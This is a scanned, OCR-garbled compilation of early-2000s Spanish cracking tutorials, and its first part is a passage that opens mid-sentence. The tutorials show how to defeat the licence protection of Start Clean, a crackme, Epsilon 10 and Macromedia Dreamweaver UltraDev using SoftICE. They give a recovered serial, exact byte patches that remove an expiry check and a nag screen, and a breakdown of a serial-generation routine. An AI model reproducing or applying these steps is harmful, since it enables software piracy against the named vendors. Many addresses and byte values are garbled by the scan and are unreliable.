nombre, así ke no nos importa, lo que si nos interesa es que nuestro amado start clean lo utiliza 
para generar nuestro s/n, así que presionas f5 y.... oh!!!! sorpresa, sice regresó! esto nos indica 
que sí podemos (y debemos) seguir rastreando el + que ingresamos. 

bueno, te preguntaras, y ahora que diablos voy a hacer? tranquilo, no comas ansias, todo a su 
tiempo, recuerdas el dicho? despacio porke precisa, asi que lo que nos queda hacer, es ver y 
analizar el siguiente fragmento de asm: 


:004011c5 ffd6 Call esi 


:004011c7 6830604000 
:004011cc 6830614000 
:004011d1 eB8aa000000 
:004011d6 8d442418 
:004011da 83c408 
:004011dd 50 

:004011de 6830604000 
:004011e3 £f£f1520924000 
:004011e9 85c0 
:004011eb 0f£8580000000 


push 00406030 

push 00406130 

call 00401280 

lea eax, dword ptr [esp+18] 

add esp, 00000008 

push eax 

push 00406030 

call dword ptr [kernel32!lstrcmpal 
test eax, eax 

jne 00401271 


bueno, seguro ahora debes estar preguntandote que pasa, dejame comentarte que esto nos dice 
que el programa toma el s/n que ingresamos, y lo compara con el verdadero, el clavo o 
problema, es saber donde es que esto ocurre. 


okas, entonces analicemos este código para ver que encontramos, vemos que aparece call 
dword ptr [kernel32!lstrecmpal, lugar donde son puestos los valores que seran comparados en 
el test eax, eax. la instrucción ¡ne 00401271 unicamente es para que si el código ingresado no 
es válido, nos muestre el mensaje de error. 


hmmm, suena algo difícil, pero es mas paja que nada, en la practica, hacemos lo siguiente: debes 
estar dentro de sice, siguiendo el s/n ingresado. presionas f10 (este es el botón de rastreo, esto 
nos permite ejecutar el programa línea por línea, muy útil). continuas presionandola, hasta que la 
línea que contiene Istrempa quede resaltada. 


en este punto, escribes "d eax" (sin las comillas, d significa dump, en español es descargar o 
mostrar al usuario) para que te muestre el contenido del registro eax. y ahora lo que ves, no es 
nada más ni nada menos que el "031199". huh, vamos por buen camino, si en este punto te 
sientes cansado, y no kieres mas, pues que poca paciencia tienes, mejor dedicate a otra cosa, o 
juega un poco, así como yo, cuando me aburro, juego mortal kombat trilogy v. pc, ejeje, es lo 
mejor. 

okas, os decía que vamos por buen camino, casí a punto de acabar este tut, así que manos a la 
ubre, digo a la obra, lo que tenemos que hacer ahora, es encontrar nuestro s/n válido, pero 
como? no se desesperen, recuerdan las primeras lineas de código del fragmento que están 
arribita? si no, veanla, y se darán cuenta que hay 2 direcciones que son empujadas al principio, 
bueno, veamos los contenidos de estás direcciones, comencemos por la segunda (según la lógica, 
en esta dirección deberíamos encontrar lo que estamos buscando), escribimos "d 406130" y lo 
que encontramos es "tanso", damnit, en está dirección está nuestro nombre, así que probemos la 
primera, "d 406030" y encontramos un número raro: "1012-9166-1739-345", están pensando lo 
mismo que yo? creo que sí, me parece que ese es el número que buscamos, así que escribanlo o 
memoricenlo, y salgan de sice. 


bueno, ahora que estamos de vuelta en windows (diganme si no se siente bien regresar al 
entorno gráfico y al manejo de lo conocido?), vamos a nuestro programita, e ingresamos el 
código que necesitamos, y nos encontramos con esto 


Register! 


Ifyou intend to use Start Clean 
for more than 30 days, you must register. 


send a che E 
addres: 
Name: 


[TansO 


Code: 


hi 012-9166-1739-345 


On Compuserw Lancel | 
OK | Register... | 


ahora presionamos enter o el botón ok, y......... 


your name, 
berto: 


registration ID: 


+ Start Clean 


Start Clean v1.2 
Copyright € 1996 Firas El-Hasan 


Registered to T aNsO 
Include files won: ¡Dptions: ==] 
Removable drives(CD, floppy, etc.] Delete empty folders 
TT” Network drives FT Minimize while cleaning | 


FT Nonexistent / Disconmected net drives Exit after cleaning 
T Windows Desktop 


Save . 
Clean Now | tico | Exit | 


Shortcuts removed: O Folders remowed: O 


4)despedida 


bueno raza, esto es todo por esta vez, es más dificil de lo que esperaba esto de escribir 
tutoriales, pero bien vale la pena, tuve algunos problemas a la hora de completar esto, pero es el 
problema de usar varios winice.dat, asi que no os preocupeis. por cierto, saludos a todos los 
amigos, karpoff, dek_oin, black fenix, etc. a mi amada kari, y a spencer (estos 2 ultimos na de na 
con el underground, pero son de lo mejor) orale gente. si me quieren contactar, mi email es 
goleeuvOhotmail.com pd. se me olvidaba decirles, si kieren repetir el crack, se darán cuenta que si lo 
registraron una vez, ya no lo pueden hacer, esto es porque el programa crea una llave en el 
registro de windows, para poder repetir el crack, simplemente ejecuten regedit, y borren 
hkey_current_usen softwarelstart clean. 


disclaimer: este documento fue escrito con fin educacional, por lo tanto, el autor no se 
responsabiliza de las acciones tomadas por terceros, ya que la información no es 
ningun delito. 
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Crackme de CrackViz, vencido!!! 


INTRODUCCION 


TAG!!! 


Qué onda raza!!! de nuevo aca su amigo “[G]oLe[E]”, pues esta vez me dije a mi 
mismo: "Mi mismo, habiendo tanto crackme en la página de Karpoff (que valga la 
propa) poke no crackeamos uno". 

Y bueno, me decidí a crackearlo, y como saben, nunca se deja de aprender, lei un 
manual muy bueno acerca de como cachar s/n con la función hmemcpy, así ke lo 
intente, el crackme fue el de crackviz, y os presento la forma de crackearlo en unos 
minutos, dependiendo de la velocidad de tu compu y de tus manos y ojos. :oP. 

Okas, también se me olvidaba decirles que he escrito este tut unos minutos después 
que mi ekipo, el ReAl mAdRIiD venció 3-2 a la Lazzio (02/13/2001), lo cual me dió un 
poco más de animo. KaRi I|cH LiEbE DiCh. 


Let's Work, digo, 
Trabajemos 


Contenido : 


1)Reconociendo al enemigo 


2)Herramientas 


3)Comienza la Acción 


4)Despedida 


1)Reconociendo al Enemigo 


Okas, como ya todos deben saber, lo mejor a la hora de crackear algo, es saber como se 
comporta ante determinadas situaciones (sorry, este tu no tendrá fotos), y bueno, al 
conseguir el crackme, hacemos correr CrkMeViz.exe, una pequeña ventana, con un menu 
Archivo, abrimos el menú, hacemos click en registrar, nos aparece una ventanita pidiendonos 
el 4 para registrarnos, ingresamos el ya conocido 031199. 

Hmmmmmmm!! nos aparece una ventana que dice Numero de Serie Incorrecto; click en 
aceptar, y se cierra la ventanita, dejandonos en la ventana principal del programa. 
Okas, suficiente del comportamiento de nuestro enemigo, acaba de preparar su muerte!!!. 


2) HERRAMIENTAS 


Unicamente usaremos una herramienta, es nuestro amado Soft |CE, eje je, ya se habrán dado 


cuenta, con el SICE hacemos mucho!!!!, lápiz y papel, si no tienes memoria suficiente o tu 
ventana de comando y ventana de datos son muy pekeñas. 


3)Manos a la Ubre, Digo a la obra 


Well, its time to start workin' (opss, sorry, se me olvida que no estoy en gringolandia). 
Bueno, es hora de empezar a trabajar, Abre el programa y ve al dialogo de registro, ingresa 
031199 (o lo que quieras) y NO PRESIONES EL BOTÓN DE REGISTRO!!!!, en su lugar presiona 
CTRL D para abrir SICE, pon un bpx para Hmemcpy así: 


bpx Hmemcpy | 


Ahora salimos de Softl CE con F5 y presionamos 
Registrar (o ALT R para los que no nos gusta usar mucho 
el mouse). 

Ahora debería aparecer SICE debido a la utilización de 
Hmemcpy, y EuReKa, lo hizo, hmmmm, ahora tenemos 
que llegar al código del programa, porque dejenme 
contarles que donde aparecimos no es el código del 
programa, si no que el código de Windows, Oks, ahora 
debemos presionar F10 muchas veces, hasta que en el 
"título" de la ventana de código veamos algo como 
"MSVBVM50!text+C9E7", generalmente lo encontrarás 
después de ver "KERNEL32!_FREQASM+04D7" en ese 
lugar. 


Cuando llegues a este lugar, presiona ALT F4 (asumo 
que estás usando el WINICE.DAT de Sandman, disponible 
en su página, o pidemelo) lo cual es una gran ayuda a la 
hora de crackear programas VB. Cuando lo hagas, veras 
en la ventana de datos una linea que dice: "Patern found 
Dl) HHHH: HHHAFRAAARE" (lo pongo así poke las 
direcciones podrian diferir). 


A esta altura, debemos eliminar el breakpoint que 
habiamos fijado para hmemcpy, y fijar uno para la 
dirección que nos dío como resultado el paso anterior 
(Dpx HAHAHAHA) Lo anterior debes hacerlo sin 
salir del SoftlCE, para evitar recibir el mensajito de 
numero incorrecto, pero si eres as DoUh!! as ¡ think, que 
otra, pero bueno, al fijar el bpx, presiona F5 y SICE 
aparecerá de nuevo (eso espero) justo en la dirección 
para la que fijaste el bpx, verás un código parecido a 


este: 

016F:7979D9E7 RET 0004 
016F:7979D9EA PUSH ESI 
016F:7979D9EB PUSH EDI 
016F:7979D9EC MOV EDI, [ESP+10] 
016F:7979D9FO MOV ESI, [ESP+0C] 
016F:7979D9F4 MOV ECX, [ESP+14] 
016F:7979D9F8 XOR EAX, EAX 
016F:7979D9FA REPZ CMPSW 
016F:7979D9FD JZ 7979DA04 
016F:7979D9FF SBB EAX, EAX 


Oks, con el bp que fijaste, apareces en la línea resaltada 
en azul, escribes d esi para ver el contenido de esi, y es 
basura, lo mismo para edi presiona, presiona F10 hasta 
que la linéa 016F: 7979D9F4 MOV ECX,[ESP+14] este 
resaltada, aca escribres: "d ecx" y Voila!! 
encontramos el + de serie por lo que parece, tomamos 
nota del mismo, limpiamos breakpoints (bc *), y salimos 
de Softl CE con F5. 


Hmmm, volvemos a abrir la ventana de registro, 
ingresamos nuestro + de serie y EXITO TOTAL. 
Eso es todo, así de fácil. 


4)Despedida 


Bueno Raza, esto es todo por esta vez, que viva el Foot 
Ball, ejo, el Real, los Rojos, y mi Novia. Por cierto, 
saludos a todos los amigos, Karpoff, Dek_Oin, Black 
Fenix, etc. Si me quieren contactar, mi email es 

goleeuvC hotmail.com PD. Ya Basta de Gente tonta que se 
roba los tuts, porfa, no hay que ser, si tanta es la cosa, 
pidan permiso a los escritores para publicar los tuts. KaRi, 
ich liebe dich 


Disclaimer: este documento fue escrito con 
propositos educacionales, debido a que la 
información es un derecho. No me hago 
responsable por lo que puedas y quieras hacer con 
la info aquí presentada. 
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Programa: Epsilon 10.00 


PROTECCION: Límit Temporal Hard-Coded 
Descripcion: Editor 
Dificultad: Newbie 


DOWNLOAD: http://www. lugaru.cony 


Herramientas: Softice, Editor Hexadecimal (el que más os guste) 


KuaTo_ThoR 12/02/2001 


INTRODUCCION 


Muy buenas a Todos amigos. En este programa veremos un buen ejemplo de lo que se denomina Límite 
Temporal Hard-Coded (HC), que suena como si fuese muy jodido, pero no lo es, al menos en este programa, 
desde luego los hay más jodidos. 


Este tipo de protección, se diferencia del típico programa de límite 30 dias, o los que sean, básicamente en 
que la fecha de fin de evaluación del programa viene prefijada, codificada en el propio programa. No depende 
del dia en el que comencemos la evaluación. Por tanto el método general de actuación de estos programas, 
será básicamente, mirar la fecha del sistema, comprobarla con la fecha límite establecida, y si nos hemos 
pasado, ya no funciona el programa. 


AL ATAKE 


Preliminares. Obtener Información 


Lo primero como siempre es saber de que va el tema. Ejecutamos el programa, y nos aparece una ventana, con lo siguiente: 


This copy of Epsilon will expire soon 


A 


[HA 


Mmmm... el programa expira el 1 Marzo de 2001, de aqui deducimos que estamos ante una protección HC. Analizamos el 
archivo ejecutable, epsilon.exe, con el File InsPEctor, con el Language 2000, o con el que más nos guste, y nos dice que el 
archivo no esta empaquetado y que está hecho en Visual C++. Perfecto. 


AL ATAKE 


Bien, ponemos a punto Sice, listo para el ataque... 


Puesto que lo que nos interesa es la comparación temporal, antes de arrancar el programa, vamos a Sice (Ctrl+D) y ponemos 
un par de breakpoints, concretamente bpx GetSystemTime y bpx GetLocalTime. Ahora sí, salimos de Sice (F5) y 
arrancamos Epsion. Salta Sice (GetSystemTime), pulsamos F5, vuelve a saltar Sice (GetLocalTime), y volvemos a pulsar F5, 
ya ha arrancado el programa, y no ha vuelto a romper Sice. Por tanto, una de esos dos sitios es el que nos interesa. Si os 
habéis dado cuenta, la segunda vez ya había aparecido la ventana del programa, pero aún no la nag inicial. Por tanto nos 
centraremos en la segunda llamada. 


Volvemos a arrancar el programa, y en la segunda ruptura de Sice, pulsamos F12 (una vez) hasta que aparecemos en 
nuestro programa, concretamente aparecemos aquí: 


:00431478 50 push eax 


* Reference To: KERNEL32.GetLocalTime, Ord: 00E2h 


| 

:00431479 FF1530C64500 Call dword ptr [0045C630] 

:0043147F 668B4C2404 mov cx, word ptr [esp+04] <- Aquí aparecemos. 
:00431484 8B 742418 mov esi, dword ptr [esp+18] 

:00431488 66890E mov word ptr [esi], cx 

:0043148B 668B4C2406 mov cx, word ptr [esp+06] 

:00431490 66894E02 mov word ptr [esi+02], cx 


:004314D0 6689460E mov word ptr [esi+0El], ax 
:004314D4 5E pop esi 

:004314D5 83C410 add esp, 00000010 

:004314D8 G3 ret <- Fin de la llamada que nos trajo aquí. 


Podemos ver que no hay ninguna comparación en el trozo completo de códgio, ni nada interesante, por tanto vamos hasta el 
Ret, pata volver a la llamada que nos trajo aquí: 


:00420C38 E833080100 call 00431470 <- Esta llamada es la del GetLocal Time 
:00420C3D 0FBF442404 movsx eax, word ptr [esp+04] <- Interesante. ?eax = año 
:00420C42 OFBF4C2406 movsx ecx, word ptr [esp+06] <- Interesante. ?ecx = mes 
:00420C47 0FBF542408 movsx edx, word ptr [esp+08] <- Interesante. ?edx = dia 
:00420C4C 83C404 add esp, 00000004 

:00420C4F 6A01 push 00000001 


:00420C51 50 push eax 

:00420C52 51 push ecx 

:00420C53 52 push edx 

:00420C54 6884E34400 push 0044E384 

:00420C59 E852FEFFFF call 00420AB0O <- Una llamada que podría ser interesante. 
:00420C5E 830424 add esp, 00000024 

:00420C61 C3 ret <- Salimos de aquí. 


Podemos ver en los valores de eax,ecx y edx al principio, nuestra fecha de hoy (en valores hexadecimales), sin duda 
interesante :). Una vez que llegamos a la llamada en 00420C59, nos metemos dentro de ella (F8): 


:00420AC5 A304474500 mov dword ptr [00454704], eax 

:00420ACA 56 push esi 

:00420ACB E8DO000000 call 00420BAO <- Una llamada, realmente interesante. 
:00420ADO 83C40C add esp, OOOOODOC 

:00420AD3 85C0 test eax, eax 

:00420AD5 7511 ¡ne 00420AE8 <- Una salto condicional. 

:00420AD7 53 push ebx 

:00420AD8 57 push edi 


Tenemos una llamada, seguida de un salto condicional, vamos a entrar a ver que hay por ahí: 


:00420BAO 8B44240C mov eax, dword ptr [esp+0C] <- Aquí comienza la llamada. eax=año 

:00420BA4 3DD1070000 cmp eax, 000007D1 <- eax contenia el valor del año. Lo compara con 7D1 = 2001. 
:00420BA9 7D03 jge 00420BAE <- Saltamos si es mayor o igual. 

:00420BAB 33C0 xor eax, eax 

:00420BAD C3 ret 


:00420BAE 7518 jne 00420BC8 <- Si no es igual, es que es mayor, y si es mayor se termino la evaluación. 
:00420BBO 8B442408 mov eax, dword ptr [esp+08] <- eax = mes 

:00420BB4 83F803 cmp eax, 00000003 <- 3 = Marzo 

:00420BB7 7D03 jge 00420BBC <- Igual que antes 

:00420BB9 33C0 xor eax, eax 

:00420BBB C3 ret 


:00420BBC 750A jne 00420BC8 <- Vamos a FIN de eval. 

:00420BBE 837C240401 cmp dword ptr [esp+04], 00000001 <- 1 = Dia 1 
:00420BC3 7D03 ¡ge 00420BC8 

:00420BC5 33C0 xor eax, eax 

:00420BC7 C3 ret 


:00420BC8 B801000000 mov eax, 00000001 <- Si nos hemos pasado en la evaluación, venimos aquí. 
:00420BCD C3 ret 


Más claro no nos lo podían haber puesto. En resumen, si estamos aún en periodo de evaluación, pone eax a cero, y si nos 
hemos pasado, la pone a 1. Por tanto con sustituir la llamada que nos traía aquí por un 'mov eax, 0', el programa no 
expirará jamás. También podemos sustituir el valor del año, en lugar de "7D1' poner 'BB8', por ejemplo (hasta el año 3000 
tenemos tiempo de sobra para evaluarlo :). 


Aún tendremos la nag inicial. Por tanto una vez hemos regresado de esta llamada (os recuerdo estaba en 00420ACB), 
vemos esto: 


:00420ACB E8D0O000000 call 00420BAO <- La llamada de las comparaciones 
:00420ADO 83C40C add esp, OOOOO0OC 

:00420AD3 85C0 test eax, eax 

:00420AD5 7511 ¡ne 00420AE8 <- Si fuese eax<>0 saltaríamos. 
:00420AD7 53 push ebx 

:00420AD8 57 push edi 

:00420AD9 56 push esi 

:00420ADA E8F1000000 call 00420BDO <- Esta llamada nos saca la nag inicial. 
:00420ADF 83C40C add esp, OODOOOOC 

:00420AE2 33C0 xor eax, eax 

:00420AF4 5F pop edi 

:00420AE5 5E pop esi 

:00420AE6 5B pop ebx 


:00420AE7 C3 ret 


Ahí en esa última llamada, nos aparece la nag inicial, sólo hay que nopearla (5 nops) o podéis poner cualquier otra cosa para 
rellenar, eso sí, que ocupe los cinco bytes del call. 


En resumen: 

- En 420ACB sustituimos el Call 00420BA0 (E8DO000000) por un mov eax, O (B800000000) 

- En 420ADA sustituimos el Call 0042BDO (E8F1000000) por cualquier cosa, por ejemplo por mov eax, O (B800000000). 
Ya sólo queda ir al editor hexa y realizar los cambios. Los offsets os lo dejo a vosotros. 


Además en el menú About, nos sigue apareciendo que nos expira el 1 Marzo de 2001. Con el Exescope podemos hacer que 
nos quede así: (sólo hay que cambiar el largo de la ventana ABOUTEVALBOX) 


About Epsilon 


FINALIZANDO 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna 
pregunta no dudéis en decírmelo. Espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es 
aprender. Sin contar con la diversión que esto supone por supuesto ;-)) 


Un Gran Saludo para todos los miembros de [K-FoR], para los amigos de Tutoriales 2000 y para todos vosotros. En especial 
para Profesor X, que me proporciono el programa, como siempre :-) 


Hasta la próxima... 
«»— "== kz on oí o» 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 


« » === z=z* zar a » 


' Bien parece que no estás cursado en esto de las aventuras: ellos son gigantes; y si tienes miedo, quítate de ahí, y 
ponte en oración en el espacio que yo voy a entrar con ellos en fiera y desigual batalla. 


Non fuyades, cobardes y viles criaturas; que un sólo caballero es el que os acomete. 


” 
. 


El Ingenioso Hidalgo Don Quijote de la Mancha 


Miguel de Cervantes Saavedra 
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MACROMEDIA DREAMWEAVER ULTRADEV versión Tryout. 
(Ampliación de MACROMEDIA PRODUCTS) 


PROTECCION: Alguna versión de Sales Agent. 

Objetivo: Buscar el Código que desbloquea el programa. 

Descripcion: Un nuevo regalo de Macromedia. 

Dificultad: Novato. 

DOWNLOAD: http: //www.macromedia.com/support/ultradev 

Herramientas: Softice 3.24, W32Dasm 8.9, Antivirus actualizado. 

CRACKER: Arkanian. FECHA: 15/02/2001 


INTRODUCCION 


No espabilan, se les ha advertido por activa y por pasiva, y no espabilan, ellos sabrán lo que hacen y porqué 
lo hacen. Remito a la gente interesada a mi ensayo anterior acerca de los Productos Macromedia , ¡¡¡de hace 


seis meses!!!, lo poco que han cambiado las cosas después de todo este tiempo, más de lo mismo, ni siquiera 
han cambiado la versión de Sales Agent, sigue siendo la 3.1.2, estoy bastante decepcionado, esperaba 
encontrar otra cosa, algo más complicado o un nuevo sistema de protección, en fin, no se puede tener todo lo 
que se quiere... 


Así que espero que este ensayo valga como una actualización del anterior. He comprobado que TODOS los 
programas de Macromedia de tipo Tryout se pueden reventar así. (Excepto Authorware y Director que, una 
vez liquidado Sales Agent, hay que buscar el número de serie con SoftICE, pero esto ya es otra historia). 


Aquí tenemos lo último de Macromedia ”...orientado al desarrollo de aplicaciones dinámicas basadas en 
bases de datos a traves de internet. Las versiones de la plataforma incluyen el nuevo Fireworks 4, que ofrece 
al usuario toda la libertad creativa necesaria para la creación y manipulación de gráficos web, permitiendo 
realizar menús desplegables y animaciones de tipo rollover". ¡Toma ya!..., ¿Qué coño son "animaciones 
rollover"? 


Dejemonos de las palabras grandilocuentes de la publicidad y vamos a echar un vistazo al lugar y a la forma 
en la que se genera el Serial para desbloquear la versión Tryout que nos limita el tiempo de uso a 30 días. 


Si te has comprado un manual o un libro sobre cualquier producto de Macromedia que viene con un CD con 
el programa de prueba y quieres aprender algo más, este ensayo es para ti. 


AL ATAKE 


Instalamos el programa , SoftICE NO debe estar activado, cuando aparezca la primera ventana de la instalación, 
abrimos una ventana MS-DOS, ejecutamos el viejo EDIT y directamente vamos a abrir el archivo 
CriWindowsaTempl istmp1.dirl_ istmp0.diriserializationud10.dll, buscamos la cadena Registration y apuntamos 
los diversos Números de Serie que amablemente no proporcionan. 


Tenemos ya un montón de Números de Serie de unos cuantos programas de Macromedia, si no he contado mal son 
exactamente 9 Números validos para programas como Dreamweaver versiones 1, 2 y 3, Dreamweaver UltraDev, 
Drumbeat 2000 E-commerce Edition y Java Server Pages Edition, Fireworks versiones 2 y 3 y un par de números que 
empiezan por BDJ100-... y por BDA100-..., que exactamente no se a que programas corresponden pero que prometo 
averiguar a la mayor brevedad posible. Pues si que biene completito el archivo de marras... 


De todas formas, una vez acabada la instalación, se puede ejecutar Regedit y en el registro del Windows, en 
HKEY_LOCAL_MACHINEISSOFTWAREWMacromediaWDreamweaver UltradevX Registration está el número 
que estamos buscando. (La X es el número de versión del programa). 


¿Por qué el programa se instala automáticamente con su número de Serie? Pues porque el programa original lo necesita 
para poder instalarse. Imaginate que tienes el programa original, que te ha costado una pasta gansa, para instalarlo 
tienes que poner el Número de Serie en alguna ventana, ¿no?, bueno pues la "protección" de Sales Agent se basa en lo 
siguiente: 


- Coge el exe o los exe's originales, UltraDev.exe en este caso, encripta la sección .text y lo renombra 
como UltraDev.tty. 

- Crea un ejecutable con el mismo nombre que el original pero de muchicimo menor tamaño cuya 
función es iniciar el programa, por supuesto, para acto seguido llamar a la libreria rsagnt32.tty que es la 
que se encarga de desencriptar el ejecutable principal en memoria, controlar el tiempo de uso del 
programa y proporcionar la intefaz esa del Buy Now, Try, etc... 

- En resumen, Sales Agent envuelve al programa en una especie de "caparazón" y limita su uso a X días, 
pero para que el programa pueda funcionar durante ese intervalo de tiempo NECESITA estar registrado 
de antemano. Por eso aparece el número que necesitamos en el Registro. 


Estos son los archivos interesantes: 


Select File to Disassemble 


Buscar en: | Dreamweaver UltaDev +] E] [es] es] sE 


rsagnt32 ty. 276KB Archivo TTY 
lan] UlttaDew Uninst.isu 1543KB Archivo ISU 11, 
to UltaDev 208KB Aplicación 13, 
ls] UltraDev.tty 5.656KB Archivo TTY 21, 
la] Ultrapop. tty 168KB Archivo TTY 27. 
la] Ultratky.tty 145KB Archivo TTY 135 


4 » 
Nombre de archivo: [tsagnt32 
Tipo de archivos: E Files[*.*] +] Cancelar 

LZ 


No adelantemos acontecimientos, así que acabamos la instalación (pedirá reiniciar el ordenador), iniciamos el 
programa, liquidamos el archivo que el antivirus detecta como "peligroso", encendemos un cigarro y dos minutos 
después, cuando salte el antivirus, volvemos a darle matarile al dichoso archivo. Nos registramos adecuadamente 
(botón de Buy Now) escogiendo las opciones Go off line y Mail/Fax en sus correspondientes ventanas y reiniciamos 
el cacharro esta vez ACTIVANDO SoftICE. 


Cargamos el programa en el Loader del Sice, esto es importante, hay que iniciarlo a traves del Symbol Loader si no la 
cosa se complica, prueba a ejecutar el programa normalmente y veras porqué. Cuando rompa en el PEP (Program 


Entry Point) le metemos un bpx GetDlgltemTextA, salimos con Crtl+D, vamos a Buy Now, rellenamos el Unlocking 
Code con lo de siempre y empezamos. 


Complete Mail/Fax Payment 


2 JARKANIAN 


e [1234567890 | 


EMPIEZA LA DIVERSION 
Rompemos con SoftICE y aterrizamos después de un F11 en el siguiente código, estamos dentro de Rsagnt32.tty: 


* Reference To: USER32.GetDlgltemTextA, Ord:0104h 

| 

:10006201 FF1578320210 Call dword ptr [10023278] 

:10006207 BF54FC0310 mov edi, 1003FC54 --> Aterrizamos aquí. Mueve nuestro Serial a EDI. 
:1000620C 83C9FF or ecx, FFFEFFFF 

:1000620F 33C0 xor eax, eax 

:10006211 F2 repnz --> Coge Nuestro serial que 

:10006212 AE scasb --> está en ES:EDI 

:10006213 F7D1 not ecx --> ECX hace de contador. 

:10006215 49 dec ecx 

:10006216 83F90A cmp ecx, 0000000A --> Lo compara con 10 caracteres 
:10006219 7455 je 10006270 --> Saltando que es gerundio... 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:10006219(C) 


| 

:10006270 E88BB3FFFF call 10001600 --> Aquí caemos... 

:10006275 8D953CFFFFFF lea edx, dword ptr [ebp+FFFEFF3C] --> Dirección para PERSONAL CODE. 
:1000627B BF48FC0310 mov edi, 1003FC48 -->»PERSONAL CODE en EDI. 
:10006280 83C9FF or ecx, FFFFFFFF 

:10006283 33C0 xor eax, eax 

:10006285 F2 repnz 

:10006286 AE scasb --> Aquí lo pilla. 

:10006287 F7D1 not ecx 

:10006289 2BF9 sub edi, ecx 

:1000628B 8BC1 mov eax, ecx 

:1000628D 8BF7 mov esi, edi --> Lo mismo en ESI. 

:1000628F 8BFA mov edi, edx 

:10006291 C1E902 shr ecx, 02 

:10006294 F3 repz 

:10006295 A5 movsd --> Otra vez en doble. 


:10006296 8BC8 mov ecx, eax 

:10006298 83E103 and ecx, 00000003 

:1000629B F3 repz 

:1000629C A4 movsb --> Los dos bytes que nos faltan. 

:1000629D 8D8D70FFFFFF lea ecx, dword ptr [ebp+FFEFFF70] --> Dirección para el Serial. 
:100062A3 51 push ecx --> Guardala para luego. 

:100062A4 8B15F4FA0310 mov edx, dword ptr [1003FAFA4] --> Algo interesante. 
:100062AA 83C266 add edx, 00000066 --> Dirección de la Tabla N* 3, (ver más abajo). 
:100062AD 52 push edx --> A guardar. 

:100062AE 8D853CFFFFFF lea eax, dword ptr [ebp+FFEFFFF3C] --> PERSONAL CODE. 
:100062B4 50 push eax --> Guarda la dirección apuntada por edx en :10006275. 
:100062B5 E8C6710000 call 1000D480 --> A quí se genera el Serial 

:100062BA 83C40C add esp, 0000000C --> Con el retorno del call el Serial en EAX 
:100062BD 33F6 xor esi, esi 

:100062BF 89B538FFFFFF mov dword ptr [ebp+FFFFFF38], esi 

:100062C5 6854FC0310 push 1003FC54 

:100062CA 8D8D70FFFFFF lea ecx, dword ptr [ebp+FEFFFF70] 

:100062D0 51 push ecx 


Como puedes ver y comparar, si has leido mi ensayo anterior, nada nuevo bajo el sol, para cuando llegamos al call que 
genera el Serial nos marean un rato con el Personal Code y el Unlocking Code de aquí para alla. Bien, vamos a entrar 
en call 1000D480 para ver como se genera el Serial. 


Lo primero que vemos es que se cargan diversas tablas de caracteres, las puedes ver haciendo D EDI o D ESTI según 
convenga para las Tablas 1* y 2?, la Tabla N* 3 aparece al rato en el valor apuntado por ECX. Estas tablas son las 
siguientes: 


Tabla N* 1 ¡POYZMEROUA 
¡Tabla N* 2 |JIKLICBXZC 
Tabla N* 3 19513844nF83jdyejj5 o 


El Serial es básicamente una transformación del Personal Code utilizando los valores de las tablas de arriba mediante 
el siguiente código: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:1000D557(C) 

| 

:1000D4FF 8D340B lea esi, dword ptr [ebx+ecx] --> En ESTI dirección de la Tabla N” 1. 
:1000D502 33C0 xor eax, eax --> Se ponen a 0 EAX 

:1000D504 33D2 xor edx, edx --> y EDX. 

:1000D506 8A042E mov al, byte ptr [esi+ebp] --> En AL primer digito del Personal Code. 
:1000D509 8A16 mov dl, byte ptr [esi] --> En DL primer caracter de la Tabla N” 1. 
:1000D50B 33C2 xor eax, edx --> Se xorea EDX con EAX 

:1000D50D 33D2 xor edx, edx --> Se limpia EDX para 

:1000D50F 8A11 mov dl, byte ptr [ecx] --> poner en DL el primer caracter de la Tabla N” 3, 
:1000D511 BE19000000 mov esi, 00000019 --> Un valor fijo en ESI. 

:1000D516 33C2 xor eax, edx --> Lo xorea de nuevo. 

:1000D518 99 cdq --> Una conversión de word a double word para la siguiente división. 
:1000D519 F7FE idiv esi --> Divide EAX entre ESI, el cociente va a AX y el resto a DX. 
:1000D51B 8B74242C mov esi, dword ptr [esp+2C] --> Se mueve a ESTI el valor 0024353A. 
:1000D51F 33C0 xor eax, eax --> EAX a 0 de nuevo. 

:1000D521 8A040E mov al, byte ptr [esi+ecx] --> Mueve a AL el primer caracter de la Tabla N* 2. 
:1000D524 BE19000000 mov esi, 00000019 --> Se prepara para una nueva división. 
:1000D529 80C241 add dl, 41 --> Le suma 0x41h al resto obtenido anteriormente. 
:1000D52C 88140F mov byte ptr [edi+ecx], dl --> Valor provisional del Unlocking Code. 
:1000D52F 81E2FF000000 and edx, OO000OFF 

:1000D535 33C2 xor eax, edx --> Xorea el resto+41 con el valor de la Tabla N” 2. 
:1000D537 33D2 xor edx, edx --> EDX a 0 otra vez. 

:1000D539 8A11 mov dl, byte ptr [ecx] --> La 3” Tabla de nuevo a DL. 

:1000D53B 33C2 xor eax, edx --> Nuevo xoreo. 

:1000D53D 99 cdq --> Conversión. 

:1000D53E F7FE idiv esi --> División de nuevo 

:1000D540 80C241 add dl, 41--> Le suma 0x41h otra vez y ya tenemos el valor definitivo. 


:1000D543 80FA4F cmp dl, 4F --> Una comparación de control. 
:1000D546 7502 jne 1000D54A --> Salta.. 
:1000D548 B258 mov dl, 58 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
|:1000D546(C) 


:1000D54A 8B442430 mov eax, dword ptr [esp+30] --> Número de carateres del Serial (0x0Ah) 
:1000D54E 88140F mov byte ptr [edi+ecx], dl --> Valor definitivo del caracter del Serial. 
:1000D551 41 inc ecx -->Incrementa el valor para la Tabla 3”. 

:1000D552 48 dec eax --> EAX es el contador. 

:1000D553 89442430 mov dword ptr [esp+30], eax --> Guardalo para la siguiente vuelta. 
:1000D557 75A6 ¡ne 1000D4FF --> Vuelta al principio hasta que EAX sea 0. 

:1000D559 8B442434 mov eax, dword ptr [esp+34] --> ¡Alehop!, ya tenemos el Serial en EAX. 
:1000D55D SE pop edi --> Vamos 

:1000D55E SE pop esi --> recuperando 

:1000D55F 5D pop ebp --> valores... 

:1000D560 C6400A00 mov [eax+0A], 00 --> Matxaka a 0 el valor siguiente al Serial. 
:1000D564 5B pop ebx --> Recupera EBX. 

:1000D565 83C418 add esp, 00000018 --> Corrige la Pila y 

:1000D368 C3 ret --> nos vamos.... 


